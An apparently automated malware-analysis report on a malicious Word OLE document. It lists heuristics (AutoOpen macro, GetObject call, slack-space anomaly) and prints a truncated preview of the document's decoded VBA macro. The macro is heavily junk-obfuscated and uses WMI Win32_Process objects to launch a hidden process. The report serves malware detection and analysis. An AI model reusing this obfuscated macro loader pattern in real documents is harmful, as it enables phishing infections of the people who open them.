MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document with a high-risk heuristic firing for VBA macros and an AutoOpen macro, indicating immediate execution upon opening. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but the presence of an AutoOpen macro and the GetObject call strongly suggest malicious intent, likely to download and execute a second-stage payload. The OLE slack anomaly also points to potential data hiding or manipulation within the file structure.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 177,421 bytes but its declared streams total only 86,606 bytes — 90,815 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45503 bytes |
SHA-256: ff8adc948e68e80b589c2703e12aa179312e52fb6909e4a4504d68e329f88d47 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "k8_0801"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Q3_395"
Function m_7_3313()
Select Case O610694_
Case 856301476
P7945_ = (l__538 * Fix(686814843 / CBool(Z7960_9))) - h_9__2 / Oct(472587792) / 664872836 + CStr(S_4516) - 291702533 + ChrB(C_3_9_)
End Select
Select Case l3__989
Case 524506268
o3585_4_ = (Q4___916 * Fix(68779480 / CBool(H7349_91))) - m__33__ / Oct(756626926) / 238428477 + CStr(F6175__) - 961230301 + ChrB(X__9_3)
End Select
Select Case w_3_524
Case 134737171
j9_385 = (c299___ * Fix(652907553 / CBool(z_9200))) - c632_2_4 / Oct(681703735) / 928044950 + CStr(L5_7_40) - 325859610 + ChrB(p08339)
End Select
Select Case W25_8__
Case 787669236
h_1_1_6 = (I95_452_ * Fix(687291470 / CBool(S00_901))) - L2__8_ / Oct(679906984) / 59912940 + CStr(j17_1_24) - 80595103 + ChrB(I48_4_2)
End Select
Select Case R______
Case 697673231
D8_327_9 = (A_5857 * Fix(439689511 / CBool(N987_2__))) - Q_744__ / Oct(177295288) / 2996236 + CStr(P342950) - 322308665 + ChrB(c6_0381)
End Select
Select Case z_168300
Case 969917109
P88_47 = (D_64_5_ * Fix(540033466 / CBool(u_2786))) - A9_4_1 / Oct(28933302) / 856200009 + CStr(q25_5_4) - 946225785 + ChrB(G200672)
End Select
Select Case h655283_
Case 27785945
E3101__ = (I__82_ * Fix(46496789 / CBool(c__018))) - B2_1564 / Oct(922241155) / 216649713 + CStr(k_7_040_) - 636608685 + ChrB(I7987_)
End Select
End Function
Function w_5024(p84753, h62078)
On Error Resume Next
Select Case i28839_9
Case 295330195
w35_695 = (E4897__4 * Fix(933987790 / CBool(i1074_44))) - I_07415_ / Oct(175316490) / 802534161 + CStr(k978_17_) - 601088305 + ChrB(W__8__86)
End Select
Select Case T048_6
Case 123926770
R12194_ = (k_8___28 * Fix(576836159 / CBool(U146350_))) - a98__0_1 / Oct(962277199) / 900648578 + CStr(Q_9_9_) - 407868609 + ChrB(q0214__)
End Select
Select Case l_9665_4
Case 268175503
w112981_ = (C52891 * Fix(550412451 / CBool(v_6749))) - R20028 / Oct(651251203) / 271928447 + CStr(F477_380) - 660387921 + ChrB(o4684_39)
End Select
v1991998 = w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405
Select Case b__456
Case 196297070
w6_980__ = (C211__45 * Fix(344720736 / CBool(i_4277))) - R_63_1 / Oct(587232471) / 519637392 + CStr(b_10_0) - 989324233 + ChrB(F612_606)
End Select
Select Case V2954_
Case 306390112
w6462_ = (z6_919_4 * Fix(503136049 / CBool(Y7_31_6))) - C_09__67 / Oct(667162280) / 714373574 + CStr(d98217) - 366274017 + ChrB(C0_0_034)
End Select
F29__4 = i_0_04_2 + "winmgmts:Win32" + i_16__ + "_Process" + z510_1
Select Case s85917
Case 317721249
X066090 = (n_9_72 * Fix(241305419 / CBool(u29095))) - a5_0__ / Oct(351756757) / 251683363 + CStr(R938_9) - 772861227 + ChrB(i_1467)
End Select
Select Case w9297_
Case 507224544
M7_10016 = (u6_58279 * Fix(53614763 / CBool(A213_29))) - z645_3_ / Oct(411523928) / 351362613 + CStr(C_97_15) - 563892474 + ChrB(H765450_)
End Select
Select Case J__915
Case 808605171
q73654_ = (r5819_76 * Fix(91823898 / CBool(d94_2__))) - A9_10_ / Oct(328444458) / 289784531 + CStr(G5460_) - 504383416 + ChrB(v30373)
End Select
Set U9814_2_ = GetObject(A_12_92 + v1991998 + U__5062)
Select Case t_8419__
Case 982956485
w6_47_6 = (s2124_ * Fix(12320654 / CBool(w_63341))) - r39_5298 / Oct(35998885) / 572272312 + CStr(Q4151__) - 397465983 + ChrB(d25134)
End Select
Select Case z1342_4_
Case 689330272
N1_695 = (G_471193 * Fix(497901881 / CBool(q55____4))) - z147_948 / Oct(724819746) / 979894920 + CStr(n___92) - 167176566 + ChrB(m__0__41)
End Select
U9814_2_.ShowWindow = G23_1_ + 952579 - 952579 + U9___08
Select Case r__7_06
Case 529770445
F7_137 = (H299
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.